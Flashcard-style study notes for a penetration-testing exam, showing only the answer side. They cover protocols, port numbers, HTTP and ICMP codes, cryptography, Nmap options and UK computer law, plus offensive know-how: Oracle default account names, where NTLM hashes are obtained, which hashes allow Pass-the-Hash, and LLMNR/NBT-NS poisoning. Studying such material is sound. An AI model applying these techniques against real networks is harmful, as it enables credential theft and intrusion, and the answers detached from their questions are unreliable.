Bad Gateway<\/p>\n\n\n\n
Service Unavailable<\/p>\n\n\n\n
Gateway Timeout<\/p>\n\n\n\n
HTTP Version Not Supported<\/p>\n\n\n\n
Network Authentication Required<\/p>\n\n\n\n
SYS<\/p>\n\n\n\n
SYSTEM<\/p>\n\n\n\n
SCOTT<\/p>\n\n\n\n
ADAMS<\/p>\n\n\n\n
JONES<\/p>\n\n\n\n
CLARK<\/p>\n\n\n\n
BLAKE<\/p>\n\n\n\n
TRACESVR<\/p>\n\n\n\n
OLAPSYS<\/p>\n\n\n\n
XDB<\/p>\n\n\n\n
Bad Request<\/p>\n\n\n\n
Unauthorized<\/p>\n\n\n\n
Payment Required<\/p>\n\n\n\n
Forbidden<\/p>\n\n\n\n
Not Found<\/p>\n\n\n\n
Method Not Allowed<\/p>\n\n\n\n
Not Acceptable<\/p>\n\n\n\n
Proxy Authentication Required<\/p>\n\n\n\n
Request Timeout<\/p>\n\n\n\n
Conflict<\/p>\n\n\n\n
Gone<\/p>\n\n\n\n
Length Required<\/p>\n\n\n\n
Payload Too Large<\/p>\n\n\n\n
Upgrade Required<\/p>\n\n\n\n
Too Many Requests<\/p>\n\n\n\n
a source of potential disruption, which has the potential to cause a risk<\/p>\n\n\n\n
the combination of consequences of a threat occurring and the likelihood of it doing so<\/p>\n\n\n\n
the risk that an event will occur which may negatively affect the achievement of organisation’s objectives, assuming there are no controls in place<\/p>\n\n\n\n
the risk which remains after taking controls in to account<\/p>\n\n\n\n
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications<\/p>\n\n\n\n
REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS<\/p>\n\n\n\n
Authentication Headers (AH)
Encapsulating Security Payloads (ESP)
Security Associations (SA) – Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)<\/p>\n\n\n\n
all passwords are converted into uppercase before generating the hash value<\/p>\n\n\n\n
password length is limited to maximum of 14 characters<\/p>\n\n\n\n
a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately<\/p>\n\n\n\n
if the password is 7 characters or less, then the second half of hash will always produce same constant value (AAD3B435B51404EE)<\/p>\n\n\n\n
the hash value is sent to network servers without salting<\/p>\n\n\n\n
uses DES<\/p>\n\n\n\n
LAN Manager (LM) hash size:<\/p>\n\n\n\n
used for network authentication<\/p>\n\n\n\n
get these hashes when using tools like Responder or Inveigh<\/p>\n\n\n\n
uses DES<\/p>\n\n\n\n
uses HMAC-MD5<\/p>\n\n\n\n
Network New Technology LAN Manager (Net-NTLM) hashes size:<\/p>\n\n\n\n
get these hashes when dumping the SAM database of any Windows OS, a Domain Controller’s Ntds.dit database or from Mimikatz<\/p>\n\n\n\n
uses MD4<\/p>\n\n\n\n
New Technology LAN Manager (NTLM) hash size:<\/p>\n\n\n\n
You CAN perform Pass-The-Hash attacks with these hashes<\/p>\n\n\n\n
You CANNOT perform Pass-The-Hash attacks with these hashes<\/p>\n\n\n\n
NetBIOS scanning tools:<\/p>\n\n\n\n
a command line utility that is integrated in windows systems and it can unveil information about the NetBIOS names and the remote machine name table or local but only for one host<\/p>\n\n\n\n
a NetBIOS nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one<\/p>\n\n\n\n
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel<\/p>\n\n\n\n
a proprietary wireless LAN authentication method developed by Cisco Systems<\/p>\n\n\n\n
uses WEP<\/p>\n\n\n\n
Rivest Cipher 4 (RC4)<\/p>\n\n\n\n
Rivest Cipher 5 (RC5)<\/p>\n\n\n\n
Data Encryption Standard (DES)<\/p>\n\n\n\n
Advanced Encryption Standard (AES)<\/p>\n\n\n\n
of a device is a unique identifier assigned to a network interface controller (NIC)<\/p>\n\n\n\n
Media Access Control (MAC) address size:<\/p>\n\n\n\n
used to uniquely identify a particular database on a system<\/p>\n\n\n\n
Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme<\/p>\n\n\n\n
source directory: execute and read permission
source file: read permission
target directory: execute and write permission
target file: you don’t need any permission since it doesn’t exit before you copy it. or write permission if the file exists<\/p>\n\n\n\n
a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response – this attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection<\/p>\n\n\n\n
a Microsoft Windows protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link<\/p>\n\n\n\n
identifies systems on a local network by their NetBIOS name<\/p>\n\n\n\n
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)\/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification\/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.<\/p>\n\n\n\n
an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request<\/p>\n\n\n\n
a database that stores Active Directory data, including information about user objects, groups, and group membership – it includes the password hashes for all users in the domain<\/p>\n\n\n\n
What is Code Red?<\/p>\n\n\n\n
MS01-033 basis<\/p>\n\n\n\n
The MS01-033 vulnerability was used by which malware?<\/p>\n\n\n\n
What is Conficker?<\/p>\n\n\n\n
The MS08-067 vulnerability was used by which malware?<\/p>\n\n\n\n
What is Blaster?<\/p>\n\n\n\n
MS03-026 basis<\/p>\n\n\n\n
The MS03-026 vulnerability was used by which malware?<\/p>\n\n\n\n
What is Nimda?<\/p>\n\n\n\n
MS04-011 basis<\/p>\n\n\n\n
MS10-002 basis<\/p>\n\n\n\n
MS10-002 name<\/p>\n\n\n\n
MS10-015 name<\/p>\n\n\n\n
MS10-061 basis<\/p>\n\n\n\n
200<\/p>\n\n\n\n
201<\/p>\n\n\n\n
202<\/p>\n\n\n\n
203<\/p>\n\n\n\n
204<\/p>\n\n\n\n
205<\/p>\n\n\n\n
Multiple Choices<\/p>\n\n\n\n
Moved Permanently<\/p>\n\n\n\n
Found<\/p>\n\n\n\n
Temporary Redirect<\/p>\n\n\n\n
Permanent Redirect<\/p>\n\n\n\n
Echo Reply<\/p>\n\n\n\n
Destination Unreachable<\/p>\n\n\n\n
Source Quench<\/p>\n\n\n\n
Redirect Message<\/p>\n\n\n\n
Echo Request<\/p>\n\n\n\n
Router Advertisement<\/p>\n\n\n\n
Router Solicitation<\/p>\n\n\n\n
Time Exceeded<\/p>\n\n\n\n
Traceroute<\/p>\n\n\n\n
Extended Echo Request<\/p>\n\n\n\n
Extended Echo Reply<\/p>\n\n\n\n
a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given Internet layer address, typically an IPv4 address<\/p>\n\n\n\n
a network management protocol used on UDP\/IP networks whereby a DHCP server dynamically assigns an IP address and other network configuration parameters to each device on a network so they can communicate with other IP networks<\/p>\n\n\n\n
a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway<\/p>\n\n\n\n
a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts<\/p>\n\n\n\n
a Cisco proprietary protocol that propagates the definition of Virtual Local Area Networks (VLAN) on the whole local area network<\/p>\n\n\n\n
a network protocol that builds a loop-free logical topology for Ethernet networks<\/p>\n\n\n\n
a protocol developed by Cisco that handles authentication, authorisation, and accounting (AAA) services<\/p>\n\n\n\n
a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet<\/p>\n\n\n\n
a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications<\/p>\n\n\n\n
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2, 4, 5, and 60 GHz frequency bands<\/p>\n\n\n\n
passive scanner on Linux<\/p>\n\n\n\n
both XXX-40 and XXX-104 were deprecated in 2004<\/p>\n\n\n\n
deprecated in 2012<\/p>\n\n\n\n
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)<\/p>\n\n\n\n
an authentication framework frequently used in wireless networks and point-to-point connections<\/p>\n\n\n\n
a proprietary wireless LAN authentication method developed by Cisco<\/p>\n\n\n\n
a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel<\/p>\n\n\n\n
a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection<\/p>\n\n\n\n
does not encrypt any traffic sent over the connection by default<\/p>\n\n\n\n
an application protocol for distributed, collaborative, hypermedia information systems<\/p>\n\n\n\n
does not encrypt any traffic sent over the connection<\/p>\n\n\n\n
used for secure communication over a computer network, and widely used on the Internet<\/p>\n\n\n\n
a standard network protocol used for the transfer of computer files between a client and server on a computer network<\/p>\n\n\n\n
does not encrypt any traffic sent over the connection<\/p>\n\n\n\n
a cryptographic network protocol for operating network services securely over an unsecured network<\/p>\n\n\n\n
an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour<\/p>\n\n\n\n
the SNMP implementation of Cisco 11.0 and 12.0 is vulnerable to certain denial of service attacks<\/p>\n\n\n\n
SNMP v1 sends passwords in clear-text over the network<\/p>\n\n\n\n
in SNMP v1 and v2c the community string is broadcast in clear-text to other devices<\/p>\n\n\n\n
a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host<\/p>\n\n\n\n
includes no login or access control mechanisms<\/p>\n\n\n\n
allows you to telnet to a device then from that device connect to the console of another device<\/p>\n\n\n\n
a networking protocol for clock synchronisation between computer systems over packet-switched, variable-latency data networks<\/p>\n\n\n\n
used to move clocks on client computers<\/p>\n\n\n\n
used in distributed denial of service (DDoS) attacks<\/p>\n\n\n\n
router based techniques for local network traffic analysis<\/p>\n\n\n\n
non-router based techniques for local network traffic analysis<\/p>\n\n\n\n
data files created using Wireshark and they contain the packet data of a network<\/p>\n\n\n\n
an internal endpoint for sending or receiving data within a node on a computer network<\/p>\n\n\n\n
command line tools are used to list established sockets and related information<\/p>\n\n\n\n
password hashes (Windows):<\/p>\n\n\n\n
password hashes (Unix):<\/p>\n\n\n\n
information contained within IP and domain registries (WHOIS)<\/p>\n\n\n\n
one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers<\/p>\n\n\n\n
the portion of the database that is replicated<\/p>\n\n\n\n
specifies authoritative information about a DNS zone<\/p>\n\n\n\n
domain to mail server<\/p>\n\n\n\n
more often carries machine-readable data, opportunistic encryption, etc.<\/p>\n\n\n\n
domain to IP<\/p>\n\n\n\n
domain to a set of name servers<\/p>\n\n\n\n
IP to a domain<\/p>\n\n\n\n
intended to provide information about host CPU type and operating system<\/p>\n\n\n\n
subdomain to a domain’s A record<\/p>\n\n\n\n
a repository usually within the Usenet system, for messages posted from many users in different locations using Internet<\/p>\n\n\n\n
a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions<\/p>\n\n\n\n
-rwxr—–<\/p>\n\n\n\n
traditionally, in Microsoft Windows, files and folders accepted four attributes:<\/p>\n\n\n\n
a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files<\/p>\n\n\n\n
transforms data into another format in such a way that only specific individual(s) can reverse the transformation<\/p>\n\n\n\n
transforms data into another format using a scheme that is publicly available so that it can easily be reversed<\/p>\n\n\n\n
uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext<\/p>\n\n\n\n
uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner<\/p>\n\n\n\n
DES – Data Encryption Standard<\/p>\n\n\n\n
DES block sizes:<\/p>\n\n\n\n
DES key sizes:<\/p>\n\n\n\n
3DES – Triple Data Encryption Standard<\/p>\n\n\n\n
3DES block sizes:<\/p>\n\n\n\n
3DES key sizes:<\/p>\n\n\n\n
AES – Advanced Encryption Standard<\/p>\n\n\n\n
AES block sizes:<\/p>\n\n\n\n
AES key sizes:<\/p>\n\n\n\n
RSA – Rivest-Shamir-Adleman<\/p>\n\n\n\n
RSA key sizes:<\/p>\n\n\n\n
cryptographic hash function which takes an input and produces a 160-bit hash value known as a message digest – typically rendered as a hexadecimal number, 40 digits long<\/p>\n\n\n\n
SHA1 block sizes:<\/p>\n\n\n\n
hash function producing a 128-bit hash value<\/p>\n\n\n\n
MD5 block sizes:<\/p>\n\n\n\n
a short piece of information used to authenticate a message – in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed<\/p>\n\n\n\n
a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key<\/p>\n\n\n\n
a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules<\/p>\n\n\n\n
often categorised as either network firewalls or host-based firewalls<\/p>\n\n\n\n
a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces<\/p>\n\n\n\n
a networking device that forwards data packets between computer networks<\/p>\n\n\n\n
a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device<\/p>\n\n\n\n
a set of cryptographic protocols designed to provide communications security over a computer network<\/p>\n\n\n\n
a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)<\/p>\n\n\n\n
a cryptographic network protocol for operating network services securely over an unsecured network<\/p>\n\n\n\n
typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH<\/p>\n\n\n\n
an encryption programme that provides cryptographic privacy and authentication for data communication<\/p>\n\n\n\n
used or signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications<\/p>\n\n\n\n
standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key<\/p>\n\n\n\n
designed as an interim solution to replace WEP without requiring the replacement of legacy hardware<\/p>\n\n\n\n
defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)<\/p>\n\n\n\n
the practice of monitoring and potentially restricting the flow of information outbound from one network to another<\/p>\n\n\n\n
TCP\/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device<\/p>\n\n\n\n
a technique used to ensure that incoming packets are actually from the networks from which they claim to originate<\/p>\n\n\n\n
a technique used to gain information about a computer system on a network and the services running on its open ports<\/p>\n\n\n\n
Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively<\/p>\n\n\n\n
works by sending packets to a target and analysing the packets that are sent back<\/p>\n\n\n\n
almost all active fingerprinting is done with:<\/p>\n\n\n\n
sniffs TCP\/IP ports, rather than generating network traffic by sending packets to them<\/p>\n\n\n\n
7<\/p>\n\n\n\n
6<\/p>\n\n\n\n
5<\/p>\n\n\n\n
4<\/p>\n\n\n\n
3<\/p>\n\n\n\n
2<\/p>\n\n\n\n
1<\/p>\n\n\n\n
an application to probe a server or host for open ports<\/p>\n\n\n\n
used to discover hosts and services on a computer network by sending packets and analysing the responses<\/p>\n\n\n\n
TCP SYN (Stealth) Scan<\/p>\n\n\n\n
TCP Connect Scan<\/p>\n\n\n\n
UDP Scan<\/p>\n\n\n\n
IP Protocol Scan<\/p>\n\n\n\n
selecting ports<\/p>\n\n\n\n
these timing templates affect many variables to adjust overall Nmap speed from very slow (-T0) to extremely aggressive (T5)<\/p>\n\n\n\n
the maximum amount of time to wait for a port scan probe response<\/p>\n\n\n\n
the maximum number of port scan probe retransmissions to a single port<\/p>\n\n\n\n
wait at least the given amount of time between sending probes to any individual host<\/p>\n\n\n\n
increase the verbosity level<\/p>\n\n\n\n
further increase the verbosity level<\/p>\n\n\n\n
output to all formats (.nmap, .xml, .gnmap)<\/p>\n\n\n\n
scan the target using the IPv6 protocol<\/p>\n\n\n\n
computer programme or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network<\/p>\n\n\n\n
measures the round-trip time for messages sent from the originating host to a destination computer that are echoed back to the source<\/p>\n\n\n\n
operates by sending Internet Control Message Protocol (ICMP) echo request packets to the target host and waiting for an ICMP echo reply<\/p>\n\n\n\n
specifies the number of data bytes to be sent<\/p>\n\n\n\n
stop after sending count ECHO_REQUEST packets<\/p>\n\n\n\n
specify a timeout, in seconds, before ping exits regardless of how many packets have been sent or received<\/p>\n\n\n\n
set the IP Time To Live (TTL)<\/p>\n\n\n\n
wait interval seconds between sending each packet<\/p>\n\n\n\n
record route<\/p>\n\n\n\n
a method that can establish a range of IP addresses which map to live hosts<\/p>\n\n\n\n
a tool used for ping sweeps<\/p>\n\n\n\n
uses 32-bit addresses (represented as 4 groups of 4 decimal numbers with the groups being separated by full stop)<\/p>\n\n\n\n
uses 128-bit addresses (represented as 8 groups of 4 hexadecimal digits with the groups being separated by colons)<\/p>\n\n\n\n
provides reliable, ordered, and error-checked delivery of a stream of octets between applications running on hosts communicating via an IP network<\/p>\n\n\n\n
has no handshaking dialogues, and thus exposes the user’s programme to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection<\/p>\n\n\n\n
used by network devices, including routers, to send error messages and operational information<\/p>\n\n\n\n
1 byte<\/p>\n\n\n\n
1 octet<\/p>\n\n\n\n
a twisted pair cable for computer networks<\/p>\n\n\n\n
suitable for most varieties of Ethernet over twisted pair<\/p>\n\n\n\n
a method of transmitting information from one place to another by sending pulses of light through an optical fibre<\/p>\n\n\n\n
standards of twisted-pair cables for the physical layer of an Ethernet computer network<\/p>\n\n\n\n
a communications protocol for local area networks<\/p>\n\n\n\n
uses a special three-byte frame called a ‘token’ that travels around a logical ‘ring’ of workstations or servers<\/p>\n\n\n\n
part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2.4, 5, and 60 GHz frequency bands<\/p>\n\n\n\n
nodes share a single communication medium (e.g. Ethernet); every message reaches every node<\/p>\n\n\n\n
communication is point-to-point through dedicated lines<\/p>\n\n\n\n
any broadcast domain that is partitioned and isolated in a computer network at the data link layer<\/p>\n\n\n\n
CMA<\/p>\n\n\n\n
DNS<\/p>\n\n\n\n
ECB<\/p>\n\n\n\n
FSMO<\/p>\n\n\n\n
HTML<\/p>\n\n\n\n
HTTP<\/p>\n\n\n\n
IAX<\/p>\n\n\n\n
ISAPI<\/p>\n\n\n\n
NFS<\/p>\n\n\n\n
PEAP<\/p>\n\n\n\n
PKI<\/p>\n\n\n\n
RADIUS<\/p>\n\n\n\n
RSA<\/p>\n\n\n\n
SCADA<\/p>\n\n\n\n
SIP<\/p>\n\n\n\n
SOA<\/p>\n\n\n\n
SOAP<\/p>\n\n\n\n
SQL<\/p>\n\n\n\n
SSH<\/p>\n\n\n\n
STP<\/p>\n\n\n\n
TKIP<\/p>\n\n\n\n
UDDI<\/p>\n\n\n\n
UDP<\/p>\n\n\n\n
WEP<\/p>\n\n\n\n
WPA<\/p>\n\n\n\n
WSDL<\/p>\n\n\n\n
finds technical vulnerabilities<\/p>\n\n\n\n
examines servers, firewalls and other hardware for security vulnerabilities<\/p>\n\n\n\n
no information is provided to the penetration tester<\/p>\n\n\n\n
full information is provided, for example network maps and access to development staff<\/p>\n\n\n\n
originally nothing to make DOS attacks illegal<\/p>\n\n\n\n
modifications in Police and Justice Act 2006 changed Section 3<\/p>\n\n\n\n
made DDOS via botnets illegal<\/p>\n\n\n\n
Article 8 – right to respect for private and family life, home and correspondence<\/p>\n\n\n\n
Section 55 – unlawful obtaining etc. of personal data<\/p>\n\n\n\n
made amendments to the Computer Misuse Act 1990<\/p>\n\n\n\n
made it illegal to perform DOS attacks<\/p>\n\n\n\n
made it illegal to supply and own hacking tools<\/p>\n\n\n\n
increased penalties of Computer Misuse Act 1990<\/p>\n\n\n\n
degradation or loss of services<\/p>\n\n\n\n
disclosure of sensitive information<\/p>\n\n\n\n
Apple Filing Protocol (AFP) over TCP<\/p>\n\n\n\n
Border Gateway Protocol (BGP)<\/p>\n\n\n\n
Bootstrap Protocol (BOOTP) server; Dynamic Host Configuration Protocol (DHCP)<\/p>\n\n\n\n
Bootstrap Protocol (BOOTP) client; Dynamic Host Configuration Protocol (DHCP)<\/p>\n\n\n\n
Character Generator Protocol (CHARGEN)<\/p>\n\n\n\n
Daytime Protocol<\/p>\n\n\n\n
Distributed Computing Environment (DCE) endpoint resolution; Microsoft End Point Mapper (EPMAP); Distributed Component Object Model (DCOM)<\/p>\n\n\n\n
Dynamic Host Configuration Protocol version 6 (DHCPv6) client<\/p>\n\n\n\n
Dynamic Host Configuration Protocol version 6 (DHCPv6) server<\/p>\n\n\n\n
Discard Protocol<\/p>\n\n\n\n
Domain Name System (DNS)<\/p>\n\n\n\n
Echo Protocol<\/p>\n\n\n\n
Finger Protocol<\/p>\n\n\n\n
File Transfer Protocol (FTP) control<\/p>\n\n\n\n
File Transfer Protocol (FTP) data transfer<\/p>\n\n\n\n
File Transfer Protocol over TLS\/SSL (FTPS) data transfer<\/p>\n\n\n\n
File Transfer Protocol over TLS\/SSL (FTPS) control<\/p>\n\n\n\n
Gopher Protocol<\/p>\n\n\n\n
Hypertext Transfer Protocol (HTTP)<\/p>\n\n\n\n
Hypertext Transfer Protocol over TLS\/SSL (HTTPS)<\/p>\n\n\n\n
Identification (ident) Protocol; Authentication Service<\/p>\n\n\n\n
Internet Message Access Protocol (IMAP)<\/p>\n\n\n\n
Internet Printing Protocol (IPP)<\/p>\n\n\n\n
Internet Relay Chat (IRC)<\/p>\n\n\n\n
Internet Relay Chat (IRC) (common alternatives)<\/p>\n\n\n\n
Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE)<\/p>\n\n\n\n
Internet Small Computer Systems Interface (iSCSI)<\/p>\n\n\n\n
Lightweight Directory Access Protocol (LDAP)<\/p>\n\n\n\n
Lightweight Directory Access Protocol over TLS\/SSL (LDAPS)<\/p>\n\n\n\n
Line Printer Daemon (LPD) protocol<\/p>\n\n\n\n
Network Basic Input\/Output System (NetBIOS) Datagram Service<\/p>\n\n\n\n
Network Basic Input\/Output System (NetBIOS) Session Service<\/p>\n\n\n\n
Network Basic Input\/Output System (NetBIOS) Name Service<\/p>\n\n\n\n
Network News Transfer Protocol (NNTP)<\/p>\n\n\n\n
Network News Transfer Protocol over TLS\/SSL (NNTPS)<\/p>\n\n\n\n
Network Time Protocol (NTP)<\/p>\n\n\n\n
Post Office Protocol version 3 (POP3)<\/p>\n\n\n\n
Post Office Protocol version 3 over TLS\/SSL (POP3S)<\/p>\n\n\n\n
Quote of the Day (QOTD)<\/p>\n\n\n\n
Real Time Streaming Protocol (RTSP)<\/p>\n\n\n\n
Routing Information Protocol (RIP)<\/p>\n\n\n\n
rlogin<\/p>\n\n\n\n
rwho; ruptime<\/p>\n\n\n\n
Microsoft Directory Services (DS) Active Directory (AD)<\/p>\n\n\n\n
Microsoft Directory Services (DS) Server Message Block (SMB)<\/p>\n\n\n\n
Simple Mail Transfer Protocol (SMTP)<\/p>\n\n\n\n
URL rendezvous directory for SSM; authenticated Simple Mail Transfer Protocol over TLS\/SSL (SMTPS)<\/p>\n\n\n\n
Secure Shell (SSH)<\/p>\n\n\n\n
Open Network Computing Remote Procedure Call (ONC RPC)<\/p>\n\n\n\n
Remote Shell (RSH); rcp<\/p>\n\n\n\n
Terminal Access Controller Access-Control System (TACACS) login host protocol; TACACS+<\/p>\n\n\n\n
Telnet protocol<\/p>\n\n\n\n
Trivial File Transfer Protocol (TFTP)<\/p>\n\n\n\n
WHOIS protocol<\/p>\n\n\n\n
Oracle database default listener<\/p>\n\n\n\n
Microsoft SQL Server (MSSQL) database management system server<\/p>\n\n\n\n
Microsoft SQL Server (MSSQL) database management system monitor<\/p>\n\n\n\n
X Display Manager Control Protocol (XDMCP)<\/p>\n\n\n\n
MySQL<\/p>\n\n\n\n
traceroute<\/p>\n\n\n\n
Squid<\/p>\n\n\n\n
OpenVPN<\/p>\n\n\n\n
ingres<\/p>\n\n\n\n
IBM Db2<\/p>\n\n\n\n
PostgreSQL database system<\/p>\n\n\n\n
Rexec<\/p>\n\n\n\n
SQL<\/p>\n\n\n\n
WEP<\/p>\n\n\n\n
DES<\/p>\n\n\n\n
TFTP<\/p>\n\n\n\n
LSA<\/p>\n\n\n\n
SAM<\/p>\n\n\n\n
PGP<\/p>\n","protected":false},"excerpt":{"rendered":"